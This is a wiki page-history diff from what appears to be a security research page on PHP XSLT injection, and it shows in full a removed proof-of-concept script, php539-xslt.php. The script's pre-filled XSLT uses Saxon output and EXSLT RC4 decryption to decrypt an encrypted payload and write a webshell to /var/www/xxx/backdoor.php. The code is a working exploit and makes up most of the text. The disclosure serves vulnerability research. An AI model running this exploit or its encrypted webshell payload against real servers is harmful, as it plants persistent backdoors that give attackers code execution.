Changes for page Application_PHP5
Last modified by Nicolas Gregoire on 2012/02/02 17:29
From version 
17.1 
17.1
edited by Nicolas Gregoire
on 2012/01/16 11:39
on 2012/01/16 11:39
Change comment:
There is no comment for this version
To version 15.1
15.1
edited by Nicolas Gregoire
on 2012/01/16 11:37
on 2012/01/16 11:37
Change comment:
There is no comment for this version
Summary
Details
-
Page properties
-
- Content
-
... ... @@ -14,7 +14,7 @@ 14 14 15 15 == PoC with crypto == 16 16 17 -A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script ([[attach:php539-xslt.php]])will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php".17 +A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php". 18 18 19 19 = Executing PHP code = 20 20
-
php539-xslt.php
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -2.0 KB - Content
-
... ... @@ -1,68 +1,0 @@ 1 - 2 -<?php 3 - 4 -// Get parameters 5 -$action = $_POST['action']; 6 -$xml = $_POST['xml']; 7 -$xsl = $_POST['xsl']; 8 - 9 -print "<html><body>"; 10 -if ($action == "transform") { 11 - 12 - print "<h2>Ready to transform ...</h2><br/>"; 13 - 14 - # LOAD XML FILE 15 - $xmldom = new DOMDocument(); 16 - print "XML: <pre>".htmlentities($xml)."</pre><br/>"; 17 - $xmldom->loadXML($xml); 18 - 19 - # LOAD XSLT FILE 20 - $xsldom = new DOMDocument(); 21 - print "XSL: <pre>".htmlentities($xsl)."</pre><br/>"; 22 - $xsldom->loadXML($xsl); // Content of $xXsl may be untrusted ! 23 - 24 - # START XSLT 25 - $xslproc = new XSLTProcessor(); 26 - $xslproc->importStylesheet($xsldom); 27 - 28 - # TRANSFORM & PRINT 29 - $output = $xslproc->transformToXML($xmldom); // File creation ! 30 - print "Output: <pre>".htmlentities($output)."</pre><br/>"; 31 - 32 -} else { 33 - 34 - # DISPLAY A PRE-FILLED FORM 35 - print "<h1>Hello!</h1><h2>You just have to click on submit() ...</h2>"; 36 - print "Consider modifying the output path (<i>/var/www/xxx/backdoor.php</i>) in the XSL<br/><br/>"; 37 - print "<form method='post'>"; 38 - print "XML document:<br/>"; 39 - print "<textarea name='xml' rows='3' cols='130'><foobar/></textarea><br/><br/>"; 40 - print "XSLT code:<br/>"; 41 - print "<textarea name='xsl' rows='20' cols='130'>"; 42 -print <<<XSLT 43 -<xsl:stylesheet 44 - version="1.0" 45 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 46 - xmlns:cry="http://exslt.org/crypto" 47 - xmlns:sax="http://icl.com/saxon" 48 - extension-element-prefixes="cry sax"> 49 - 50 - <xsl:template match="/"> 51 - <sax:output href="/var/www/xxx/backdoor.php" method="text"> 52 - <xsl:value-of select="cry:rc4_decrypt('simple_demo', '0262ee34196ae2df1ab850c1705ee0c38dc6ae42bbeecf140dea99675fb35539a4dcbeaf5c2e6a6cae679843dbf3650275a6be07464047dc17eff2661b8f065f0ae3abcd3b33e9fd3c48a36f2201ae65e093fa45b0a1b55cd408ec815a8dada050b8881b99e957704dc5f17208d105966680a26f')"/> 53 - </sax:output> 54 - <xsl:text>A webshell have been dropped</xsl:text> 55 - </xsl:template> 56 - 57 -</xsl:stylesheet> 58 -XSLT; 59 - print "</textarea><br/><br/>"; 60 - print "<input type='hidden' name='action' value='transform'/>"; 61 - print "<input type='submit'/></form>"; 62 - 63 -} 64 -print "</body></html>"; 65 - 66 -?> 67 - 68 -